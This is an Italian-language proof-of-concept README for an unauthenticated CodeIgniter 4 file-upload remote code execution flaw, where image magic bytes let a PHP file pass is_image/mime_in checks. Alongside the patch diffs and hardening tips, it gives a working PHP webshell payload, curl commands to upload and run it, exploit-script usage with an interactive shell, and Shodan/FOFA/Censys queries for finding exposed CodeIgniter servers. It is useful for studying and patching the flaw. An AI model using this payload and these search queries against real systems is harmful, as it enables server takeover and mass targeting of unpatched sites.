
CVE-2026-63223 PoC — CodeIgniter 4 is_image/mime_in File Upload RCE (CVSS 9.8). Esecuzione remota di codice non autenticata tramite bypass del caricamento di file senza restrizioni usando byte magici delle immagini. Corretto in v4.7.4.
CVSS 9.8 (Critico) | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-434: Upload senza restrizioni di file con tipo pericoloso
Corretto in: CodeIgniter 4 v4.7.4
Avviso di sicurezza: GHSA-mmj4-63m4-r6h5
Le regole di validazione dell'upload file is_image e mime_in di CodeIgniter 4 controllano solo il tipo MIME derivato dal contenuto (magic bytes), non l'estensione del nome file fornita dal client.
Un attaccante non autenticato può anteporre magic bytes di immagini (GIF89a, \xFF\xD8\xFF\xE0, \x89PNG…) a una webshell PHP, chiamarla , e questa supererà la validazione di o mantenendo comunque un'estensione eseguibile pericolosa. Quando il file caricato viene salvato in una directory accessibile dal web, l'attaccante ottiene .
shell.phpis_imagemime_inis_image o mime_in senza un controllo indipendente dell'estensione (ext_in).php)La correzione in v4.7.4 aggiunge due nuovi metodi helper e li integra nelle regole di validazione:
is_image — Prima vs Dopo// BEFORE (vulnerable) — only checks MIME starts with "image/"
if (mb_strpos($type, 'image') !== 0) {
return false;
}
return true;
// AFTER (patched) — also checks extension is an image type
if (mb_strpos($type, 'image') !== 0) {
return false;
}
if ($this->hasInvalidImageClientExtension($file)) { // ← NEW
return false;
}
return true;
mime_in — Prima vs Dopo// BEFORE (vulnerable) — only checks MIME is in allowed list
if (! in_array($file->getMimeType(), $params, true)) {
return false;
}
return true;
// AFTER (patched) — also checks extension matches detected content
if (! in_array($file->getMimeType(), $params, true)) {
return false;
}
if ($this->hasMismatchedClientExtension($file)) { // ← NEW
return false;
}
return true;
// Rejects when non-empty client extension is NOT an image type
private function hasInvalidImageClientExtension(UploadedFile $file): bool
{
$clientExtension = trim(strtolower($file->getClientExtension()), '. ');
if ($clientExtension === '') return false;
$type = Mimes::guessTypeFromExtension($clientExtension) ?? '';
return mb_strpos($type, 'image') !== 0;
}
// Rejects when client extension doesn't match detected content type
private function hasMismatchedClientExtension(UploadedFile $file): bool
{
$clientExtension = trim(strtolower($file->getClientExtension()), '. ');
if ($clientExtension === '') return false;
return $file->guessExtension() !== $clientExtension;
}
Punto chiave: La correzione demanda ai metodi esistenti Mimes::guessTypeFromExtension() e $file->guessExtension(), aggiungendo un secondo livello di validazione. Gli upload senza estensione (ad es. oggetti JavaScript Blob) vengono ancora accettati.
CVE-2026-63223-POC/
├── README.md ← this file
├── Dockerfile ← vulnerable lab setup
├── docker-compose.yml ← easy `docker compose up`
├── exploit/
│ └── exploit.py ← Python exploit script
└── vulnerable-app/
├── app/Controllers/Upload.php ← vulnerable controller
├── app/Config/Routes.php ← routing
└── app/Views/
├── upload_form_avatar.php ← is_image bypass form
├── upload_form_doc.php ← mime_in bypass form
└── upload_form_safe.php ← SAFE reference form
# Build & start the vulnerable app
docker compose up -d
# Verify it's running
curl http://localhost:8080/health
# → "CVE-2026-63223 PoC Lab — OK"
# Open in browser
open http://localhost:8080/upload/avatar
| Endpoint | Vulnerabilità | Validazione |
|---|---|---|
/upload/avatar | VULNERABILE | solo is_image |
/upload/document | VULNERABILE | solo mime_in |
/upload/safe | SICURO (controllo) | is_image + ext_in |
# Install dependency
pip install requests
# Single command execution
python3 exploit/exploit.py -t http://localhost:8080/upload/avatar --cmd "id"
# Interactive shell
python3 exploit/exploit.py -t http://localhost:8080/upload/avatar --shell
# Using mime_in vector (with PDF in allowed list, but PHP still passes)
python3 exploit/exploit.py -t http://localhost:8080/upload/document --cmd "uname -a"
# Generate payload
python3 -c "
import sys
php = b'<?php if(isset(\$_REQUEST[\"c\"])){system(\$_REQUEST[\"c\"]);die();} ?>'
sys.stdout.buffer.write(b'GIF89a\n' + php)
" > evil.php
# Verify it's recognized as an image by file(1)
file evil.php
# → evil.php: GIF image data
# Upload to vulnerable is_image endpoint
curl -F "[email protected];type=image/gif" http://localhost:8080/upload/avatar
# Execute
curl http://localhost:8080/uploads/evil.php?c=id
# JPEG variant (also passes is_image)
python3 exploit/exploit.py -t http://localhost:8080/upload/avatar \
--method jpg --filename wp-admin.php --cmd "ls -la /"
# PNG variant (also passes is_image, .phtml extension)
python3 exploit/exploit.py -t http://localhost:8080/upload/avatar \
--method png --filename config.phtml --shell
Il superglobale PHP $_FILES e l'oggetto UploadedFile di CodeIgniter contengono due informazioni separate:
type / getMimeType() — Derivato dai magic bytes del file (basato sul contenuto), inviato dal browser come parte Content-Type dell'upload multipartname / getClientName() — Il nome file originale dal client, inclusa l'estensionePrima della patch, is_image e mime_in controllavano solo il punto #1. Un attaccante invia:
Content-Disposition: form-data; name="avatar"; filename="shell.php"
Content-Type: image/gif
GIF89a
<?php system($_REQUEST['c']); ?>
is_image vede image/gif → superashell.php (nome client preservato).php nella directory uploads → RCEDopo la patch, l'estensione viene verificata in modo incrociato:
hasInvalidImageClientExtension() vede .php → rifiutaCerca file PHP/PHTML/PHP5 con magic bytes di immagini nella tua directory uploads:
# Find PHP files that start with image headers
find uploads/ -name "*.php" -exec file {} \; | grep -E '(GIF|JPEG|PNG) image'
# Or check raw bytes
xxd uploads/*.php | head
# CodeIgniter 4 default welcome page
http.title:"Welcome to CodeIgniter"
# CI4 debug toolbar (exposed in development mode)
http.html:"debugbar_loader"
# CI4 default cookie / session fingerprint
http.component:"CodeIgniter"
# CI4-powered apps with file upload endpoints
http.title:"CodeIgniter" http.html:"upload"
# Broad search — any CI4 instance
"CodeIgniter" "X-Powered-By: PHP"
# Default CodeIgniter 4 scaffold
body="CodeIgniter" && body="Welcome to"
# CI4 debug toolbar leaked (dev mode = more likely vulnerable)
body="debugbar_loader" && body="kint-rich"
# File upload forms on CI4
body="enctype=\"multipart/form-data\"" && body="CodeIgniter"
# CI4 session fingerprint in Set-Cookie
header="ci_session"
# Broad CI4 detection
app="CodeIgniter Framework"
# ZoomEye
app:"CodeIgniter" +"file upload"
# Censys
services.http.response.body:"Welcome to CodeIgniter"
ext_in insieme a is_image/mime_inreadfile()<Directory "/var/www/html/public/uploads">
php_admin_flag engine off
</Directory>
Questo PoC è solo per scopi educativi e test di sicurezza autorizzati. La vulnerabilità è stata divulgata in modo responsabile e corretta. Non utilizzare questo codice contro sistemi che non possiedi o per cui non hai esplicita autorizzazione al test. Gli autori non si assumono alcuna responsabilità per un uso improprio.